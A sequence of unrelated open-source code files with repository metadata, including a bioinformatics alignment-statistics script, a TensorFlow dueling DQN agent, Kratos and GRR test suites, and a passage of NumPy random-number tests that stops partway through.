77fdc2f819320110ed56b5b61968468f73dfc5cb
|
[
"BSD-2-Clause",
"BSD-3-Clause"
] | null | null | null |
scripts/psl2table.py
|
861934367/cgat
|
77fdc2f819320110ed56b5b61968468f73dfc5cb
|
[
"BSD-2-Clause",
"BSD-3-Clause"
] | 1
|
2019-08-04T22:46:38.000Z
|
2019-08-04T22:46:38.000Z
|
'''
psl2table.py - output stats for psl formatted alignments
================================================================
:Author: Andreas Heger
:Release: $Id$
:Date: |today|
:Tags: Python
Purpose
-------
.. todo::
describe purpose of the script.
Usage
-----
Example::
python psl2table.py --help
Type::
python psl2table.py --help
for command line help.
Command line options
--------------------
'''
import sys
import re
import CGAT.Experiment as E
import CGAT.Blat as Blat
import CGAT.SequenceProperties as SequenceProperties
import CGAT.SequencePairProperties as SequencePairProperties
import CGAT.WrapperCodeML as WrapperCodeML
USAGE = \
"""analyze sequence pairs from a psl formatted table.
The sequences are assumed to be nucleotide sequences.
Methods available are:
baseml: compute baseml rates
counts: compute residue counts (percent G+C, ...)
match: compute match statistics (pid, coverage)
"""
# ------------------------------------------------------------------------
class Counter:
def __init__(self, options):
pass
class CounterMatch(Counter):
def __init__(self, *args, **kwargs):
Counter.__init__(self, *args, **kwargs)
def __call__(self, match):
self.mPid = 100.0 * match.mNMatches / \
(match.mNMatches + match.mNMismatches)
self.mQueryCoverage = 100.0 * \
(match.mNMatches + match.mNMismatches) / match.mQueryLength
def __str__(self):
return "%6.4f\t%6.4f" % (self.mPid, self.mQueryCoverage)
def getHeaders(self):
return ["pid", "qCov"]
class QueriesCounter(SequenceProperties.SequencePropertiesNA):
def __init__(self, *args, **kwargs):
SequenceProperties.SequencePropertiesNA.__init__(self, *args, **kwargs)
def __call__(self, seq1, seq2):
SequenceProperties.SequencePropertiesNA.loadSequence(self, seq1)
class SbjctsCounter(SequenceProperties.SequencePropertiesNA):
def __init__(self, *args, **kwargs):
SequenceProperties.SequencePropertiesNA.__init__(self, *args, **kwargs)
def __call__(self, seq1, seq2):
SequenceProperties.SequencePropertiesNA.loadSequence(self, seq2)
# ------------------------------------------------------------------------
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if argv is None:
argv = sys.argv
parser = E.OptionParser(version="%prog version: $Id: psl2table.py 2891 2010-04-07 08:59:18Z andreas $",
usage=globals()["__doc__"])
parser.add_option("--mask-lowercase", dest="mask_lowercase", action="store_true",
help="mask lowercase characters before computing properties [default=%default]")
parser.add_option("--with-match", dest="with_match", action="store_true",
help="echo the match in output [default=%default]")
parser.add_option("--without-match", dest="with_match", action="store_false",
help="do not echo the match in output [default=%default]")
parser.add_option("-m", "--method", dest="methods", type="choice", action="append",
choices=(
"counts", "baseml", "match", "query-counts", "sbjct-counts"),
help="methods to compute properties between sequence pairs.")
WrapperCodeML.BaseML().AddOptions(parser)
parser.set_defaults(
methods=[],
mask_lowercase=False,
is_pslx=True,
with_match=True,
)
(options, args) = E.Start(parser)
counters_plain = []
counters = []
for method in options.methods:
if method == "counts":
counters.append(
SequencePairProperties.SequencePairPropertiesCountsNa())
elif method == "query-counts":
counters.append(QueriesCounter())
elif method == "sbjct-counts":
counters.append(SbjctsCounter())
elif method == "baseml":
counters.append(
SequencePairProperties.SequencePairPropertiesBaseML(options))
elif method == "match":
counters_plain.append(CounterMatch(options))
if counters:
iterator = Blat.iterator_pslx(options.stdin)
header = "\t".join(Blat.MatchPSLX().getHeaders())
else:
iterator = Blat.iterator(options.stdin)
header = "\t".join(Blat.Match().getHeaders())
if not options.with_match:
header = "qName"
options.stdout.write("\t".join(
[header, ] +
["\t".join(x.getHeaders()) for x in counters] +
["\t".join(x.getHeaders()) for x in counters_plain]) + "\n")
ninput, noutput, nskipped = 0, 0, 0
# setup totals
# totals = {}
# for section in options.sections:
# if section == "length":
# s = SequencePropertiesLength()
# elif section == "na":
# s = SequencePropertiesNA()
# elif section == "aa":
# s = SequencePropertiesAA()
# elif section == "degeneracy":
# s = SequencePropertiesDegeneracy()
# elif section == "bias":
# s = SequencePropertiesBias( reference_codons )
# elif section == "codons":
# s = SequencePropertiesCodons()
# elif section == "codon-usage":
# s = SequencePropertiesCodonUsage()
# elif section == "codon-translator":
# s = SequencePropertiesCodonTranslator()
# else:
# raise "unknown section %s" % section
# totals[section] = s
for match in iterator:
ninput += 1
if options.with_match:
options.stdout.write(str(match))
else:
options.stdout.write(match.mQueryId)
if counters:
qseq = match.mQuerySequence
sseq = match.mSbjctSequence
# mask non printable characters - sometimes
# appear after using pslToPslX
qseq = [re.sub("[^a-zA-Z]", "N", x) for x in qseq]
sseq = [re.sub("[^a-zA-Z]", "N", x) for x in sseq]
if options.mask_lowercase:
qseq = [re.sub("[a-z]", "N", x) for x in qseq]
sseq = [re.sub("[a-z]", "N", x) for x in sseq]
match.mQuerySequence = qseq
match.mSbjctSequence = sseq
qseq = "".join(match.mQuerySequence).upper()
sseq = "".join(match.mSbjctSequence).upper()
if len(qseq) != len(sseq):
if options.loglevel >= 1:
options.stdlog.write(
"# WARNING: two sequences of unequal length in match\n# %s\n" % str(match))
nskipped += 1
continue
for counter in counters:
counter(qseq, sseq)
options.stdout.write("\t" +
"\t".join(
[str(counter) for counter in counters]))
if counters_plain:
for counter in counters_plain:
counter(match)
options.stdout.write("\t" +
"\t".join(
[str(counter) for counter in counters_plain]))
options.stdout.write("\n")
noutput += 1
if options.loglevel >= 1:
options.stdlog.write(
"# ninput=%i, noutput=%i, nskipped=%i\n" % (ninput, noutput, nskipped))
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
| 29.186047
| 107
| 0.566135
|
5888bddc279642a95b880fd6902f03f41aa1b105
| 5,793
|
py
|
Python
|
duelingDQN.py
|
957001934/Multi-Commander
|
20a3229a24040be95fadb02521d9a1f2f14e1888
|
[
"MIT"
] | 6
|
2019-08-03T04:04:34.000Z
|
2021-07-17T07:26:41.000Z
|
duelingDQN.py
|
957001934/Multi-Commander
|
20a3229a24040be95fadb02521d9a1f2f14e1888
|
[
"MIT"
] | null | null | null |
duelingDQN.py
|
957001934/Multi-Commander
|
20a3229a24040be95fadb02521d9a1f2f14e1888
|
[
"MIT"
] | null | null | null |
"""
Dueling DQN implementation using tensorflow
"""
import tensorflow as tf
import numpy as np
import random
from collections import deque
import copy
class DuelingDQNAgent(object):
def __init__(self, config):
self.state_size = config['state_size']
self.action_size = config['action_size']
self.memory = deque(maxlen=2000)
self.gamma = 0.95 # discount factor
self.epsilon = 1.0 # exploration rate
self.epsilon_min = 0.01
self.epsilon_decay = 0.995
self.learning_rate = 0.001
# self.update_target_freq =
self.batch_size = 32
self.qmodel = None
self.target_model = None
self.layer_size = {'shared':[20],
'V':[1],
'A':[20, self.action_size]}
self.global_step = 0
self.sess = tf.Session(config=tf.ConfigProto(device_count={'gpu':0}))
self.sess.__enter__()
self._build_model()
self.sess.run(tf.global_variables_initializer())
self.update_target_network()
self.saver = tf.train.Saver() # must after initializer
intersection_id = list(config['lane_phase_info'].keys())[0]
self.phase_list = config['lane_phase_info'][intersection_id]['phase']
def _build_model(self):
self.state = tf.placeholder(tf.float32, [None, ] + [self.state_size], name='state')
self.state_ = tf.placeholder(tf.float32, [None, ] + [self.state_size], name='state_')
self.q_target = tf.placeholder(tf.float32, [None, ] + [self.action_size], name='q_target')
# with tf.variable_scope('qnet'):
# pass
# with tf.variable_scope('target'):
# pass
self.qmodel_output = self._build_network('qnet', self.state, self.layer_size)
self.targte_model_output = self._build_network('target', self.state_, self.layer_size)
# loss, and other operations
with tf.variable_scope('loss'):
self.q_loss = tf.reduce_mean(tf.squared_difference(self.qmodel_output, self.q_target))
with tf.variable_scope('train'):
self.train_op = tf.train.AdamOptimizer(self.learning_rate).minimize(self.q_loss)
# replace target net with q net
self.q_net_params = tf.get_collection('qnet')
self.target_net_paprams = tf.get_collection('target')
self.copy_target_op = [tf.assign(t, q) for t, q in zip(self.target_net_paprams, self.q_net_params)]
def _build_network(self, scope, state, layer_size):
with tf.variable_scope(scope):
with tf.variable_scope('shared'):
hidden = state
shared_layer_size = layer_size['shared']
for size in shared_layer_size:
hidden = tf.layers.dense(hidden, size,
bias_initializer=tf.constant_initializer(0.1),
kernel_initializer=tf.random_normal_initializer(0.1, 0.3))
hidden = tf.nn.relu(hidden)
with tf.variable_scope('Value'):
V = hidden
V_size = layer_size['V']
for size in V_size:
V = tf.layers.dense(V, size,
bias_initializer=tf.constant_initializer(0.1),
kernel_initializer=tf.random_normal_initializer(0.1, 0.3))
# no relu
with tf.variable_scope('Advantage'):
A = hidden
A_size = layer_size['A']
for size in A_size:
A = tf.layers.dense(A, size,
bias_initializer=tf.constant_initializer(0.1),
kernel_initializer=tf.random_normal_initializer(0.1, 0.3))
with tf.variable_scope('Q'):
out = V + (A - tf.reduce_mean(A, axis=1, keep_dims=True))
return out
def choose_action(self, state):
if np.random.rand() <= self.epsilon:
return random.randrange(self.action_size)
q_values = tf.get_default_session().run(self.qmodel_output, feed_dict={self.state: state})
return np.argmax(q_values[0])
def replay(self):
minibatch = random.sample(self.memory, self.batch_size)
states = []
q_target = []
for state, action, reward, next_state in minibatch:
states.append(state)
q_eval = tf.get_default_session().run(self.qmodel_output, feed_dict={self.state:state})
q_next = tf.get_default_session().run(self.qmodel_output, feed_dict={self.state:next_state})
target_value = reward + self.gamma * np.max(q_next)
# q_target_ = copy.copy(q_eval)
q_target_ = q_eval.copy()
q_target_[0][action] = target_value
q_target.append(q_target_)
states = np.reshape(np.array(states), [-1, self.state_size])
q_target = np.reshape(np.array(q_target), [-1, self.action_size])
feed_dict = {self.state:states,
self.q_target:q_target}
# batch training
tf.get_default_session().run(self.train_op, feed_dict=feed_dict)
def update_target_network(self):
tf.get_default_session().run(self.copy_target_op)
def remember(self, state, action, reward, next_state):
action = self.phase_list.index(action)
self.memory.append((state, action, reward, next_state))
def save(self, ckpt, epoch):
self.saver.save(self.sess, ckpt, global_step=epoch)
print("model saved: {}-{}".format(ckpt, epoch))
def load(self, ckpt):
self.saver.restore(self.sess, ckpt)
| 38.62
| 107
| 0.587778
|
90864d9709d4b64fddc01d10d06eb3faa52ae0d7
| 52
|
py
|
Python
|
graphrepo/drillers/__init__.py
|
sofiapereiraGIT/GraphRepo
|
ee479f097615d33b87d2621498272d2d8de1471d
|
[
"Apache-2.0"
] | null | null | null |
graphrepo/drillers/__init__.py
|
sofiapereiraGIT/GraphRepo
|
ee479f097615d33b87d2621498272d2d8de1471d
|
[
"Apache-2.0"
] | null | null | null |
graphrepo/drillers/__init__.py
|
sofiapereiraGIT/GraphRepo
|
ee479f097615d33b87d2621498272d2d8de1471d
|
[
"Apache-2.0"
] | null | null | null |
from .driller import *
from .cache_driller import *
| 17.333333
| 28
| 0.769231
|
1d5842abdc41b081dcffbc393fa4887fae9749e2
| 377
|
py
|
Python
|
IMPACTA/Unid02_Sem6.py/exe_2.py
|
FR7/Meus-Projetos
|
1c8e1a91eaf143cccdc10f0e7edd013d910de474
|
[
"MIT"
] | null | null | null |
IMPACTA/Unid02_Sem6.py/exe_2.py
|
FR7/Meus-Projetos
|
1c8e1a91eaf143cccdc10f0e7edd013d910de474
|
[
"MIT"
] | null | null | null |
IMPACTA/Unid02_Sem6.py/exe_2.py
|
FR7/Meus-Projetos
|
1c8e1a91eaf143cccdc10f0e7edd013d910de474
|
[
"MIT"
] | null | null | null |
# A série de Fibonacci é formada pela sequência 1, 1, 2, 3, 5, 8, 13, 21, 34, ... Escreva um programa
# que apresente a série de Fibonacci até o n-ésimo termo (n > 0).
n = int(input("Digite o num n-ésimo termo para mostrar a serie de fibonacci: "))
a = 0
b = 1
print(a)
for x in range (b, n):
c = a
a = b
b = a + c
print(a)
| 29
| 101
| 0.549072
|
cd593c432f1ccecbba367d8bdf0967564f12d185
| 2,011
|
py
|
Python
|
applications/FSIApplication/tests/test_mpi_FSIApplication.py
|
lcirrott/Kratos
|
8406e73e0ad214c4f89df4e75e9b29d0eb4a47ea
|
[
"BSD-4-Clause"
] | 2
|
2019-10-25T09:28:10.000Z
|
2019-11-21T12:51:46.000Z
|
applications/FSIApplication/tests/test_mpi_FSIApplication.py
|
lcirrott/Kratos
|
8406e73e0ad214c4f89df4e75e9b29d0eb4a47ea
|
[
"BSD-4-Clause"
] | 13
|
2019-10-07T12:06:51.000Z
|
2020-02-18T08:48:33.000Z
|
applications/FSIApplication/tests/test_mpi_FSIApplication.py
|
lcirrott/Kratos
|
8406e73e0ad214c4f89df4e75e9b29d0eb4a47ea
|
[
"BSD-4-Clause"
] | 1
|
2020-06-12T08:51:24.000Z
|
2020-06-12T08:51:24.000Z
|
# import Kratos
from KratosMultiphysics import *
from KratosMultiphysics.FSIApplication import *
# Import Kratos "wrapper" for unittests
import KratosMultiphysics.KratosUnittest as KratosUnittest
# Import the tests o test_classes to create the suits
## SMALL TESTS
from convergence_accelerator_spring_MPI_test import ConvergenceAcceleratorSpringMPITest
## NIGTHLY TESTS
## VALIDATION TESTS
def AssembleTestSuites():
''' Populates the test suites to run.
Populates the test suites to run. At least, it should populate the suites:
"small", "nighlty" and "all"
Return
------
suites: A dictionary of suites
The set of suites with its test_cases added.
'''
suites = KratosUnittest.KratosSuites
### Small MPI tests ########################################################
smallMPISuite = suites['mpi_small']
smallMPISuite.addTest(ConvergenceAcceleratorSpringMPITest('test_aitken_accelerator_constant_forces'))
smallMPISuite.addTest(ConvergenceAcceleratorSpringMPITest('test_aitken_accelerator_variable_stiffness'))
smallMPISuite.addTest(ConvergenceAcceleratorSpringMPITest('test_aitken_accelerator_ghost_nodes'))
smallMPISuite.addTest(ConvergenceAcceleratorSpringMPITest('test_mvqn_recursive_accelerator_constant_forces'))
smallMPISuite.addTest(ConvergenceAcceleratorSpringMPITest('test_mvqn_recursive_accelerator_variable_stiffness'))
smallMPISuite.addTest(ConvergenceAcceleratorSpringMPITest('test_mvqn_recursive_accelerator_ghost_nodes'))
### Nightly MPI tests ######################################################
nightlyMPISuite = suites['mpi_nightly']
nightlyMPISuite.addTests(smallMPISuite)
### Full MPI set ###########################################################
allMPISuite = suites['mpi_all']
allMPISuite.addTests(nightlyMPISuite)
allSuite = suites['all']
allSuite.addTests(allMPISuite)
return suites
if __name__ == '__main__':
KratosUnittest.runTests( AssembleTestSuites() )
| 37.240741
| 116
| 0.719543
|
746d310d2457a1828d927b9980078063f37b4ec2
| 172
|
py
|
Python
|
fourpisky/sites/ami.py
|
4pisky/fourpisky-core
|
1dc9c4f73dfef075e2a27c3c8453d811a5a99e58
|
[
"BSD-2-Clause"
] | 2
|
2016-08-25T22:20:58.000Z
|
2018-11-18T21:16:11.000Z
|
fourpisky/sites/ami.py
|
4pisky/fourpisky-core
|
1dc9c4f73dfef075e2a27c3c8453d811a5a99e58
|
[
"BSD-2-Clause"
] | 2
|
2016-11-01T14:10:58.000Z
|
2016-11-01T14:11:39.000Z
|
fourpisky/sites/ami.py
|
4pisky/fourpisky-core
|
1dc9c4f73dfef075e2a27c3c8453d811a5a99e58
|
[
"BSD-2-Clause"
] | null | null | null |
import ephem
AmiLA = ephem.Observer()
AmiLA.lat = ephem.degrees('52.16977')
AmiLA.lon = ephem.degrees('0.059167')
AmiLA.horizon = ephem.degrees('20')
AmiLA.name = 'AMI-LA'
| 24.571429
| 37
| 0.715116
|
2281138ef695ae786ad3aa89a59b7e45d3f0f74d
| 899
|
py
|
Python
|
gui/api_plugins/output_plugin_test.py
|
pchaigno/grr
|
69c81624c281216a45c4bb88a9d4e4b0613a3556
|
[
"Apache-2.0"
] | 1
|
2015-01-07T05:29:57.000Z
|
2015-01-07T05:29:57.000Z
|
gui/api_plugins/output_plugin_test.py
|
pchaigno/grr
|
69c81624c281216a45c4bb88a9d4e4b0613a3556
|
[
"Apache-2.0"
] | null | null | null |
gui/api_plugins/output_plugin_test.py
|
pchaigno/grr
|
69c81624c281216a45c4bb88a9d4e4b0613a3556
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
"""This module contains tests for output plugins-related API renderers."""
from grr.gui import api_test_lib
from grr.lib import flags
from grr.lib import output_plugin
from grr.lib import test_lib
from grr.lib import utils
from grr.lib.output_plugins import csv_plugin
from grr.lib.output_plugins import email_plugin
class ApiOutputPluginsListRendererRegressionTest(
api_test_lib.ApiCallRendererRegressionTest):
"""Regression test for ApiOutputPluginsListRenderer."""
renderer = "ApiOutputPluginsListRenderer"
def Run(self):
with utils.Stubber(output_plugin.OutputPlugin, "classes", {
"EmailOutputPlugin": email_plugin.EmailOutputPlugin,
"CSVOutputPlugin": csv_plugin.CSVOutputPlugin
}):
self.Check("GET", "/api/output-plugins/all")
def main(argv):
test_lib.main(argv)
if __name__ == "__main__":
flags.StartMain(main)
| 25.685714
| 74
| 0.761958
|
4284861bd204069daecd42c8d56251205d65180f
| 38,486
|
py
|
Python
|
bin/Python27/Lib/site-packages/numpy/random/tests/test_random.py
|
lefevre-fraser/openmeta-mms
|
08f3115e76498df1f8d70641d71f5c52cab4ce5f
|
[
"MIT"
] | null | null | null |
bin/Python27/Lib/site-packages/numpy/random/tests/test_random.py
|
lefevre-fraser/openmeta-mms
|
08f3115e76498df1f8d70641d71f5c52cab4ce5f
|
[
"MIT"
] | null | null | null |
bin/Python27/Lib/site-packages/numpy/random/tests/test_random.py
|
lefevre-fraser/openmeta-mms
|
08f3115e76498df1f8d70641d71f5c52cab4ce5f
|
[
"MIT"
] | 1
|
2020-05-07T11:04:14.000Z
|
2020-05-07T11:04:14.000Z
|
from __future__ import division, absolute_import, print_function
import numpy as np
from numpy.testing import (
TestCase, run_module_suite, assert_, assert_raises, assert_equal,
assert_warns)
from numpy import random
from numpy.compat import asbytes
import sys
import warnings
class TestSeed(TestCase):
def test_scalar(self):
s = np.random.RandomState(0)
assert_equal(s.randint(1000), 684)
s = np.random.RandomState(4294967295)
assert_equal(s.randint(1000), 419)
def test_array(self):
s = np.random.RandomState(range(10))
assert_equal(s.randint(1000), 468)
s = np.random.RandomState(np.arange(10))
assert_equal(s.randint(1000), 468)
s = np.random.RandomState([0])
assert_equal(s.randint(1000), 973)
s = np.random.RandomState([4294967295])
assert_equal(s.randint(1000), 265)
def test_invalid_scalar(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, np.random.RandomState, -0.5)
assert_raises(ValueError, np.random.RandomState, -1)
def test_invalid_array(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, np.random.RandomState, [-0.5])
assert_raises(ValueError, np.random.RandomState, [-1])
assert_raises(ValueError, np.random.RandomState, [4294967296])
assert_raises(ValueError, np.random.RandomState, [1, 2, 4294967296])
assert_raises(ValueError, np.random.RandomState, [1, -2, 4294967296])
class TestBinomial(TestCase):
def test_n_zero(self):
# Tests the corner case of n == 0 for the binomial distribution.
# binomial(0, p) should be zero for any p in [0, 1].
# This test addresses issue #3480.
zeros = np.zeros(2, dtype='int')
for p in [0, .5, 1]:
assert_(random.binomial(0, p) == 0)
np.testing.assert_array_equal(random.binomial(zeros, p), zeros)
def test_p_is_nan(self):
# Issue #4571.
assert_raises(ValueError, random.binomial, 1, np.nan)
class TestMultinomial(TestCase):
def test_basic(self):
random.multinomial(100, [0.2, 0.8])
def test_zero_probability(self):
random.multinomial(100, [0.2, 0.8, 0.0, 0.0, 0.0])
def test_int_negative_interval(self):
assert_(-5 <= random.randint(-5, -1) < -1)
x = random.randint(-5, -1, 5)
assert_(np.all(-5 <= x))
assert_(np.all(x < -1))
def test_size(self):
# gh-3173
p = [0.5, 0.5]
assert_equal(np.random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.multinomial(1, p, [2, 2]).shape, (2, 2, 2))
assert_equal(np.random.multinomial(1, p, (2, 2)).shape, (2, 2, 2))
assert_equal(np.random.multinomial(1, p, np.array((2, 2))).shape,
(2, 2, 2))
assert_raises(TypeError, np.random.multinomial, 1, p,
np.float(1))
class TestSetState(TestCase):
def setUp(self):
self.seed = 1234567890
self.prng = random.RandomState(self.seed)
self.state = self.prng.get_state()
def test_basic(self):
old = self.prng.tomaxint(16)
self.prng.set_state(self.state)
new = self.prng.tomaxint(16)
assert_(np.all(old == new))
def test_gaussian_reset(self):
# Make sure the cached every-other-Gaussian is reset.
old = self.prng.standard_normal(size=3)
self.prng.set_state(self.state)
new = self.prng.standard_normal(size=3)
assert_(np.all(old == new))
def test_gaussian_reset_in_media_res(self):
# When the state is saved with a cached Gaussian, make sure the
# cached Gaussian is restored.
self.prng.standard_normal()
state = self.prng.get_state()
old = self.prng.standard_normal(size=3)
self.prng.set_state(state)
new = self.prng.standard_normal(size=3)
assert_(np.all(old == new))
def test_backwards_compatibility(self):
# Make sure we can accept old state tuples that do not have the
# cached Gaussian value.
old_state = self.state[:-2]
x1 = self.prng.standard_normal(size=16)
self.prng.set_state(old_state)
x2 = self.prng.standard_normal(size=16)
self.prng.set_state(self.state)
x3 = self.prng.standard_normal(size=16)
assert_(np.all(x1 == x2))
assert_(np.all(x1 == x3))
def test_negative_binomial(self):
# Ensure that the negative binomial results take floating point
# arguments without truncation.
self.prng.negative_binomial(0.5, 0.5)
class TestRandint(TestCase):
rfunc = np.random.randint
# valid integer/boolean types
itype = [np.bool_, np.int8, np.uint8, np.int16, np.uint16,
np.int32, np.uint32, np.int64, np.uint64]
def test_unsupported_type(self):
assert_raises(TypeError, self.rfunc, 1, dtype=np.float)
def test_bounds_checking(self):
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
assert_raises(ValueError, self.rfunc, lbnd - 1, ubnd, dtype=dt)
assert_raises(ValueError, self.rfunc, lbnd, ubnd + 1, dtype=dt)
assert_raises(ValueError, self.rfunc, ubnd, lbnd, dtype=dt)
assert_raises(ValueError, self.rfunc, 1, 0, dtype=dt)
def test_rng_zero_and_extremes(self):
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
tgt = ubnd - 1
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = lbnd
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = (lbnd + ubnd)//2
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
def test_in_bounds_fuzz(self):
# Don't use fixed seed
np.random.seed()
for dt in self.itype[1:]:
for ubnd in [4, 8, 16]:
vals = self.rfunc(2, ubnd, size=2**16, dtype=dt)
assert_(vals.max() < ubnd)
assert_(vals.min() >= 2)
vals = self.rfunc(0, 2, size=2**16, dtype=np.bool)
assert_(vals.max() < 2)
assert_(vals.min() >= 0)
def test_repeatability(self):
import hashlib
# We use a md5 hash of generated sequences of 1000 samples
# in the range [0, 6) for all but np.bool, where the range
# is [0, 2). Hashes are for little endian numbers.
tgt = {'bool': '7dd3170d7aa461d201a65f8bcf3944b0',
'int16': '1b7741b80964bb190c50d541dca1cac1',
'int32': '4dc9fcc2b395577ebb51793e58ed1a05',
'int64': '17db902806f448331b5a758d7d2ee672',
'int8': '27dd30c4e08a797063dffac2490b0be6',
'uint16': '1b7741b80964bb190c50d541dca1cac1',
'uint32': '4dc9fcc2b395577ebb51793e58ed1a05',
'uint64': '17db902806f448331b5a758d7d2ee672',
'uint8': '27dd30c4e08a797063dffac2490b0be6'}
for dt in self.itype[1:]:
np.random.seed(1234)
# view as little endian for hash
if sys.byteorder == 'little':
val = self.rfunc(0, 6, size=1000, dtype=dt)
else:
val = self.rfunc(0, 6, size=1000, dtype=dt).byteswap()
res = hashlib.md5(val.view(np.int8)).hexdigest()
assert_(tgt[np.dtype(dt).name] == res)
# bools do not depend on endianess
np.random.seed(1234)
val = self.rfunc(0, 2, size=1000, dtype=np.bool).view(np.int8)
res = hashlib.md5(val).hexdigest()
assert_(tgt[np.dtype(np.bool).name] == res)
def test_respect_dtype_singleton(self):
# See gh-7203
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
sample = self.rfunc(lbnd, ubnd, dtype=dt)
self.assertEqual(sample.dtype, np.dtype(dt))
for dt in (np.bool, np.int, np.long):
lbnd = 0 if dt is np.bool else np.iinfo(dt).min
ubnd = 2 if dt is np.bool else np.iinfo(dt).max + 1
# gh-7284: Ensure that we get Python data types
sample = self.rfunc(lbnd, ubnd, dtype=dt)
self.assertFalse(hasattr(sample, 'dtype'))
self.assertEqual(type(sample), dt)
class TestRandomDist(TestCase):
# Make sure the random distribution returns the correct value for a
# given seed
def setUp(self):
self.seed = 1234567890
def test_rand(self):
np.random.seed(self.seed)
actual = np.random.rand(3, 2)
desired = np.array([[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_randn(self):
np.random.seed(self.seed)
actual = np.random.randn(3, 2)
desired = np.array([[1.34016345771863121, 1.73759122771936081],
[1.498988344300628, -0.2286433324536169],
[2.031033998682787, 2.17032494605655257]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_randint(self):
np.random.seed(self.seed)
actual = np.random.randint(-99, 99, size=(3, 2))
desired = np.array([[31, 3],
[-52, 41],
[-48, -66]])
np.testing.assert_array_equal(actual, desired)
def test_random_integers(self):
np.random.seed(self.seed)
actual = np.random.random_integers(-99, 99, size=(3, 2))
desired = np.array([[31, 3],
[-52, 41],
[-48, -66]])
np.testing.assert_array_equal(actual, desired)
def test_random_integers_max_int(self):
# Tests whether random_integers can generate the
# maximum allowed Python int that can be converted
# into a C long. Previous implementations of this
# method have thrown an OverflowError when attempting
# to generate this integer.
actual = np.random.random_integers(np.iinfo('l').max,
np.iinfo('l').max)
desired = np.iinfo('l').max
np.testing.assert_equal(actual, desired)
def test_random_integers_deprecated(self):
with warnings.catch_warnings():
warnings.simplefilter("error", DeprecationWarning)
# DeprecationWarning raised with high == None
assert_raises(DeprecationWarning,
np.random.random_integers,
np.iinfo('l').max)
# DeprecationWarning raised with high != None
assert_raises(DeprecationWarning,
np.random.random_integers,
np.iinfo('l').max, np.iinfo('l').max)
def test_random_sample(self):
np.random.seed(self.seed)
actual = np.random.random_sample((3, 2))
desired = np.array([[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_choice_uniform_replace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 4)
desired = np.array([2, 3, 2, 3])
np.testing.assert_array_equal(actual, desired)
def test_choice_nonuniform_replace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 4, p=[0.4, 0.4, 0.1, 0.1])
desired = np.array([1, 1, 2, 2])
np.testing.assert_array_equal(actual, desired)
def test_choice_uniform_noreplace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 3, replace=False)
desired = np.array([0, 1, 3])
np.testing.assert_array_equal(actual, desired)
def test_choice_nonuniform_noreplace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 3, replace=False,
p=[0.1, 0.3, 0.5, 0.1])
desired = np.array([2, 3, 1])
np.testing.assert_array_equal(actual, desired)
def test_choice_noninteger(self):
np.random.seed(self.seed)
actual = np.random.choice(['a', 'b', 'c', 'd'], 4)
desired = np.array(['c', 'd', 'c', 'd'])
np.testing.assert_array_equal(actual, desired)
def test_choice_exceptions(self):
sample = np.random.choice
assert_raises(ValueError, sample, -1, 3)
assert_raises(ValueError, sample, 3., 3)
assert_raises(ValueError, sample, [[1, 2], [3, 4]], 3)
assert_raises(ValueError, sample, [], 3)
assert_raises(ValueError, sample, [1, 2, 3, 4], 3,
p=[[0.25, 0.25], [0.25, 0.25]])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4, 0.2])
assert_raises(ValueError, sample, [1, 2], 3, p=[1.1, -0.1])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4])
assert_raises(ValueError, sample, [1, 2, 3], 4, replace=False)
assert_raises(ValueError, sample, [1, 2, 3], 2, replace=False,
p=[1, 0, 0])
def test_choice_return_shape(self):
p = [0.1, 0.9]
# Check scalar
assert_(np.isscalar(np.random.choice(2, replace=True)))
assert_(np.isscalar(np.random.choice(2, replace=False)))
assert_(np.isscalar(np.random.choice(2, replace=True, p=p)))
assert_(np.isscalar(np.random.choice(2, replace=False, p=p)))
assert_(np.isscalar(np.random.choice([1, 2], replace=True)))
assert_(np.random.choice([None], replace=True) is None)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(np.random.choice(arr, replace=True) is a)
# Check 0-d array
s = tuple()
assert_(not np.isscalar(np.random.choice(2, s, replace=True)))
assert_(not np.isscalar(np.random.choice(2, s, replace=False)))
assert_(not np.isscalar(np.random.choice(2, s, replace=True, p=p)))
assert_(not np.isscalar(np.random.choice(2, s, replace=False, p=p)))
assert_(not np.isscalar(np.random.choice([1, 2], s, replace=True)))
assert_(np.random.choice([None], s, replace=True).ndim == 0)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(np.random.choice(arr, s, replace=True).item() is a)
# Check multi dimensional array
s = (2, 3)
p = [0.1, 0.1, 0.1, 0.1, 0.4, 0.2]
assert_(np.random.choice(6, s, replace=True).shape, s)
assert_(np.random.choice(6, s, replace=False).shape, s)
assert_(np.random.choice(6, s, replace=True, p=p).shape, s)
